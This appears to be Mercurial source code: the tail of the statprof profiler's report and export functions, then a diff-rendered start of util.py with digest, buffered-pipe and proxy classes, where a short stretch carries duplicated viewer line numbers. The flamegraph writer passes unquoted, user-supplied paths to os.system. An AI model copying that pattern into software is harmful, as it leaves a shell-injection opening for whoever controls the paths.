                             total_cum_sec,
                             total_self_sec,
                             total_percent,
                             sitestats))

    # sort by total self sec
    functiondata.sort(reverse=True, key=lambda x: x[2])

    for function in functiondata:
        if function[3] < 0.05:
            continue
        fp.write(b'%6.2f %9.2f %9.2f %s\n' % (
            function[3], # total percent
            function[1], # total cum sec
            function[2], # total self sec
            function[0])) # file:function

        function[4].sort(reverse=True, key=lambda i: i.selfseconds())
        for stat in function[4]:
            # only show line numbers for significant locations (>1% time spent)
            if stat.selfpercent() > 1:
                source = stat.site.getsource(25)
                if sys.version_info.major >= 3 and not isinstance(source, bytes):
                    source = pycompat.bytestr(source)

                stattuple = (stat.selfpercent(), stat.selfseconds(),
                             stat.site.lineno, source)

                fp.write(b'%33.0f%% %6.2f line %d: %s\n' % stattuple)

def display_about_method(data, fp, function=None, **kwargs):
    if function is None:
        raise Exception("Invalid function")

    filename = None
    if ':' in function:
        filename, function = function.split(':')

    relevant_samples = 0
    parents = {}
    children = {}

    for sample in data.samples:
        for i, site in enumerate(sample.stack):
            if site.function == function and (not filename
                                              or site.filename() == filename):
                relevant_samples += 1
                if i != len(sample.stack) - 1:
                    parent = sample.stack[i + 1]
                    if parent in parents:
                        parents[parent] = parents[parent] + 1
                    else:
                        parents[parent] = 1

                if site in children:
                    children[site] = children[site] + 1
                else:
                    children[site] = 1

    parents = [(parent, count) for parent, count in parents.iteritems()]
    parents.sort(reverse=True, key=lambda x: x[1])
    for parent, count in parents:
        fp.write(b'%6.2f%% %s:%s line %s: %s\n' %
                 (count / relevant_samples * 100,
                  pycompat.fsencode(parent.filename()),
                  pycompat.sysbytes(parent.function),
                  parent.lineno,
                  pycompat.sysbytes(parent.getsource(50))))

    stats = SiteStats.buildstats(data.samples)
    stats = [s for s in stats
             if s.site.function == function and
             (not filename or s.site.filename() == filename)]

    total_cum_sec = 0
    total_self_sec = 0
    total_self_percent = 0
    total_cum_percent = 0
    for stat in stats:
        total_cum_sec += stat.totalseconds()
        total_self_sec += stat.selfseconds()
        total_self_percent += stat.selfpercent()
        total_cum_percent += stat.totalpercent()

    fp.write(
        b'\n %s:%s Total: %0.2fs (%0.2f%%) Self: %0.2fs (%0.2f%%)\n\n'
        % (
        pycompat.sysbytes(filename or '___'),
        pycompat.sysbytes(function),
        total_cum_sec,
        total_cum_percent,
        total_self_sec,
        total_self_percent
        ))

    children = [(child, count) for child, count in children.iteritems()]
    children.sort(reverse=True, key=lambda x: x[1])
    for child, count in children:
        fp.write(b' %6.2f%% line %s: %s\n' %
                 (count / relevant_samples * 100, child.lineno,
                  pycompat.sysbytes(child.getsource(50))))

def display_hotpath(data, fp, limit=0.05, **kwargs):
    class HotNode(object):
        def __init__(self, site):
            self.site = site
            self.count = 0
            self.children = {}

        def add(self, stack, time):
            self.count += time
            site = stack[0]
            child = self.children.get(site)
            if not child:
                child = HotNode(site)
                self.children[site] = child

            if len(stack) > 1:
                i = 1
                # Skip boilerplate parts of the stack
                while i < len(stack) and stack[i].skipname() in skips:
                    i += 1
                if i < len(stack):
                    child.add(stack[i:], time)

    root = HotNode(None)
    lasttime = data.samples[0].time
    for sample in data.samples:
        root.add(sample.stack[::-1], sample.time - lasttime)
        lasttime = sample.time

    def _write(node, depth, multiple_siblings):
        site = node.site
        visiblechildren = [c for c in node.children.itervalues()
                           if c.count >= (limit * root.count)]
        if site:
            indent = depth * 2 - 1
            filename = ''
            function = ''
            if len(node.children) > 0:
                childsite = list(node.children.itervalues())[0].site
                filename = (childsite.filename() + ':').ljust(15)
                function = childsite.function

            # lots of string formatting
            listpattern = ''.ljust(indent) +\
                          ('\\' if multiple_siblings else '|') +\
                          ' %4.1f%% %s %s'
            liststring = listpattern % (node.count / root.count * 100,
                                        filename, function)
            codepattern = '%' + ('%d' % (55 - len(liststring))) + 's %d: %s'
            codestring = codepattern % ('line', site.lineno, site.getsource(30))

            finalstring = liststring + codestring
            childrensamples = sum([c.count for c in node.children.itervalues()])
            # Make frames that performed more than 10% of the operation red
            if node.count - childrensamples > (0.1 * root.count):
                finalstring = '\033[91m' + finalstring + '\033[0m'
            # Make frames that didn't actually perform work dark grey
            elif node.count - childrensamples == 0:
                finalstring = '\033[90m' + finalstring + '\033[0m'
            fp.write(finalstring + b'\n')

        newdepth = depth
        if len(visiblechildren) > 1 or multiple_siblings:
            newdepth += 1

        visiblechildren.sort(reverse=True, key=lambda x: x.count)
        for child in visiblechildren:
            _write(child, newdepth, len(visiblechildren) > 1)

    if root.count > 0:
        _write(root, 0, False)

def write_to_flame(data, fp, scriptpath=None, outputfile=None, **kwargs):
    if scriptpath is None:
        scriptpath = encoding.environ['HOME'] + '/flamegraph.pl'
    if not os.path.exists(scriptpath):
        fp.write(b'error: missing %s\n' % scriptpath)
        fp.write(b'get it here: https://github.com/brendangregg/FlameGraph\n')
        return

    fd, path = pycompat.mkstemp()

    file = open(path, "w+")

    lines = {}
    for sample in data.samples:
        sites = [s.function for s in sample.stack]
        sites.reverse()
        line = ';'.join(sites)
        if line in lines:
            lines[line] = lines[line] + 1
        else:
            lines[line] = 1

    for line, count in lines.iteritems():
        file.write("%s %d\n" % (line, count))

    file.close()

    if outputfile is None:
        outputfile = '~/flamegraph.svg'

    # run the script whose existence was checked above, rather than
    # unconditionally assuming it lives at ~/flamegraph.pl
    os.system("perl %s %s > %s" % (scriptpath, path, outputfile))
    fp.write(b'Written to %s\n' % outputfile)
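
# Example (illustrative): producing a flamegraph through display(); the
# keyword arguments are forwarded to write_to_flame() and the paths are
# hypothetical:
#
#   display(format=DisplayFormats.FlameGraph,
#           scriptpath='/opt/FlameGraph/flamegraph.pl',
#           outputfile='/tmp/flamegraph.svg')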

_pathcache = {}
def simplifypath(path):
    '''Attempt to make the path to a Python module easier to read by
    removing whatever part of the Python search path it was found
    on.'''

    if path in _pathcache:
        return _pathcache[path]
    orig = path
    hgpath = pycompat.fsencode(encoding.__file__).rsplit(os.sep, 2)[0]
    for p in [hgpath] + sys.path:
        prefix = p + os.sep
        if path.startswith(prefix):
            path = path[len(prefix):]
            break
    # key the cache by the original path so later lookups actually hit
    _pathcache[orig] = path
    return path
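
# Example (illustrative, assuming '/usr/lib/python3/dist-packages' is on
# sys.path):
#
#   simplifypath('/usr/lib/python3/dist-packages/mercurial/util.py')
#   # -> 'mercurial/util.py'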

def write_to_json(data, fp):
    samples = []

    for sample in data.samples:
        stack = []

        for frame in sample.stack:
            stack.append(
                (pycompat.sysstr(frame.path),
                 frame.lineno,
                 pycompat.sysstr(frame.function)))

        samples.append((sample.time, stack))

    data = json.dumps(samples)
    if not isinstance(data, bytes):
        data = data.encode('utf-8')

    fp.write(data)
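
# Sketch of the JSON produced above (shape inferred from the code, not a
# documented format): a list of [time, stack] pairs, where each stack entry
# is [path, lineno, function]:
#
#   [[0.01, [["mercurial/util.py", 142, "bitsfrom"], ...]], ...]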

def write_to_chrome(data, fp, minthreshold=0.005, maxthreshold=0.999):
    samples = []
    laststack = collections.deque()
    lastseen = collections.deque()

    # The Chrome tracing format allows us to use a compact stack
    # representation to save space. It's fiddly but worth it.
    # We maintain a bijection between stack and ID.
    stack2id = {}
    id2stack = [] # will eventually be rendered

    def stackid(stack):
        if not stack:
            return
        if stack in stack2id:
            return stack2id[stack]
        parent = stackid(stack[1:])
        myid = len(stack2id)
        stack2id[stack] = myid
        id2stack.append(dict(category=stack[0][0], name='%s %s' % stack[0]))
        if parent is not None:
            id2stack[-1].update(parent=parent)
        return myid
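
    # Illustration (not executed): stackid() interns each distinct stack
    # suffix once and links it to its parent, so the trace can reference
    # whole stacks by small integer IDs, e.g.:
    #
    #   stackid((('a.py:1', 'f'),))                    # -> 0
    #   stackid((('b.py:2', 'g'), ('a.py:1', 'f')))    # -> 1, parent=0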

    # The sampling profiler can sample multiple times without
    # advancing the clock, potentially causing the Chrome trace viewer
    # to render single-pixel columns that we cannot zoom in on. We
    # work around this by pretending that zero-duration samples are a
    # millisecond in length.

    clamp = 0.001

    # We provide knobs that by default attempt to filter out stack
    # frames that are too noisy:
    #
    # * A few take almost all execution time. These are usually boring
    #   setup functions, giving a stack that is deep but uninformative.
    #
    # * Numerous samples take almost no time, but introduce lots of
    #   noisy, oft-deep "spines" into a rendered profile.

    blacklist = set()
    totaltime = data.samples[-1].time - data.samples[0].time
    minthreshold = totaltime * minthreshold
    maxthreshold = max(totaltime * maxthreshold, clamp)

    def poplast():
        oldsid = stackid(tuple(laststack))
        oldcat, oldfunc = laststack.popleft()
        oldtime, oldidx = lastseen.popleft()
        duration = sample.time - oldtime
        if minthreshold <= duration <= maxthreshold:
            # ensure no zero-duration events
            sampletime = max(oldtime + clamp, sample.time)
            samples.append(dict(ph='E', name=oldfunc, cat=oldcat, sf=oldsid,
                                ts=sampletime*1e6, pid=0))
        else:
            blacklist.add(oldidx)

    # Much fiddling to synthesize correctly(ish) nested begin/end
    # events given only stack snapshots.

    for sample in data.samples:
        stack = tuple((('%s:%d' % (simplifypath(frame.path), frame.lineno),
                        frame.function) for frame in sample.stack))
        qstack = collections.deque(stack)
        if laststack == qstack:
            continue
        while laststack and qstack and laststack[-1] == qstack[-1]:
            laststack.pop()
            qstack.pop()
        while laststack:
            poplast()
        for f in reversed(qstack):
            lastseen.appendleft((sample.time, len(samples)))
            laststack.appendleft(f)
            path, name = f
            sid = stackid(tuple(laststack))
            samples.append(dict(ph='B', name=name, cat=path, ts=sample.time*1e6,
                                sf=sid, pid=0))
        laststack = collections.deque(stack)
    while laststack:
        poplast()
    events = [s[1] for s in enumerate(samples) if s[0] not in blacklist]
    frames = collections.OrderedDict((str(k), v)
                                     for (k, v) in enumerate(id2stack))
    json.dump(dict(traceEvents=events, stackFrames=frames), fp, indent=1)
    fp.write('\n')

def printusage():
    print(r"""
The statprof command line allows you to inspect the last profile's results in
the following forms:

usage:
    hotpath [-l --limit percent]
        Shows a graph of calls with the percent of time each takes.
        Red calls take over 10% of the total time themselves.
    lines
        Shows the actual sampled lines.
    functions
        Shows the samples grouped by function.
    function [filename:]functionname
        Shows the callers and callees of a particular function.
    flame [-s --script-path] [-o --output-file path]
        Writes out a flamegraph to output-file (defaults to ~/flamegraph.svg)
        Requires that ~/flamegraph.pl exist.
        (Specify alternate script path with --script-path.)""")

def main(argv=None):
    if argv is None:
        argv = sys.argv

    if len(argv) == 1:
        printusage()
        return 0

    displayargs = {}

    optstart = 2
    displayargs['function'] = None
    if argv[1] == r'hotpath':
        displayargs['format'] = DisplayFormats.Hotpath
    elif argv[1] == r'lines':
        displayargs['format'] = DisplayFormats.ByLine
    elif argv[1] == r'functions':
        displayargs['format'] = DisplayFormats.ByMethod
    elif argv[1] == r'function':
        displayargs['format'] = DisplayFormats.AboutMethod
        displayargs['function'] = argv[2]
        optstart = 3
    elif argv[1] == r'flame':
        displayargs['format'] = DisplayFormats.FlameGraph
    else:
        printusage()
        return 0

    # process options (parse the argv that was passed in, not sys.argv)
    try:
        opts, args = pycompat.getoptb(argv[optstart:], "hl:f:o:p:",
            ["help", "limit=", "file=", "output-file=", "script-path="])
    except getopt.error as msg:
        print(msg)
        printusage()
        return 2

    displayargs['limit'] = 0.05
    path = None
    for o, value in opts:
        if o in (r"-l", r"--limit"):
            displayargs['limit'] = float(value)
        elif o in (r"-f", r"--file"):
            path = value
        elif o in (r"-o", r"--output-file"):
            displayargs['outputfile'] = value
        elif o in (r"-p", r"--script-path"):
            displayargs['scriptpath'] = value
        elif o in (r"-h", r"--help"):
            printusage()
            return 0
        else:
            assert False, "unhandled option %s" % o

    if not path:
        print(r'must specify --file to load')
        return 1

    load_data(path=path)

    display(**pycompat.strkwargs(displayargs))

    return 0

if __name__ == r"__main__":
    sys.exit(main())
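
# Example (illustrative): inspecting a saved profile from a shell, assuming
# this module is importable as 'statprof' and the data path is hypothetical:
#
#   $ python -c 'import statprof; statprof.main()' \
#         hotpath --file /tmp/prof.data --limit 0.1
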
@@ -1,4021 +1,4021 b''
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import time
import traceback
import warnings
import zlib

from .thirdparty import (
    attr,
)
from hgdemandimport import tracing
from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    procutil,
    stringutil,
)

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
readlink = platform.readlink
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

# python 2.6 still has deprecation warnings enabled by default. We do not want
# to display anything to the standard user, so detect if we are running tests
# and only use Python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python-native deprecation warning.

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))

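# Example (illustrative): verifying a download against a known size and
# digest; the file name, size, and 'expected_sha1' value are hypothetical:
#
#   fh = digestchecker(open('bundle.hg', 'rb'), 1024,
#                      {'sha1': expected_sha1})
#   while fh.read(4096):
#       pass
#   fh.validate()   # raises error.Abort on any mismatch
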
269 try:
269 try:
270 buffer = buffer
270 buffer = buffer
271 except NameError:
271 except NameError:
272 def buffer(sliceable, offset=0, length=None):
272 def buffer(sliceable, offset=0, length=None):
273 if length is not None:
273 if length is not None:
274 return memoryview(sliceable)[offset:offset + length]
274 return memoryview(sliceable)[offset:offset + length]
275 return memoryview(sliceable)[offset:]
275 return memoryview(sliceable)[offset:]
276
276
277 _chunksize = 4096
277 _chunksize = 4096
278
278
279 class bufferedinputpipe(object):
279 class bufferedinputpipe(object):
280 """a manually buffered input pipe
280 """a manually buffered input pipe
281
281
282 Python will not let us use buffered IO and lazy reading with 'polling' at
282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 the same time. We cannot probe the buffer state and select will not detect
283 the same time. We cannot probe the buffer state and select will not detect
284 that data are ready to read if they are already buffered.
284 that data are ready to read if they are already buffered.
285
285
    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the outside (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there
        is already buffered data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with
            # a _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if len(self._buffer) > 1:
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data into the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data

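# An illustrative sketch (an editor's addition, not part of the original
# module): a caller that cooperates with ``bufferedinputpipe`` when polling.
# ``proc`` and ``handleline`` are hypothetical names. The key point is to
# consult ``hasbuffer`` before blocking in ``select``, since data already
# buffered here will never wake the poll.
#
#   import select
#
#   pipe = bufferedinputpipe(proc.stdout)
#   while not pipe.closed:
#       if pipe.hasbuffer or select.select([pipe.fileno()], [], [])[0]:
#           handleline(pipe.readline())
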
def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

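# Illustrative usage sketch (an editor's addition): ``mmapread`` returns an
# object that can be sliced like bytes without reading the whole file into
# memory. ``path`` is a hypothetical name.
#
#   with open(path, 'rb') as fp:
#       data = mmapread(fp)
#       header = data[0:4]    # only the needed pages are actually read
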
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed is a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

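# Illustrative sketch (an editor's addition): the proxy forwards each call to
# the wrapped file, then notifies a method of the same name on the observer,
# passing the result first. A minimal observer only defines the events it
# cares about. ``countingobserver`` and 'data.bin' are hypothetical.
#
#   class countingobserver(object):
#       reads = 0
#       def read(self, res, size=-1):
#           countingobserver.reads += 1
#
#   proxy = fileobjectproxy(open('data.bin', 'rb'), countingobserver())
#   proxy.read(10)    # increments countingobserver.reads
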
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

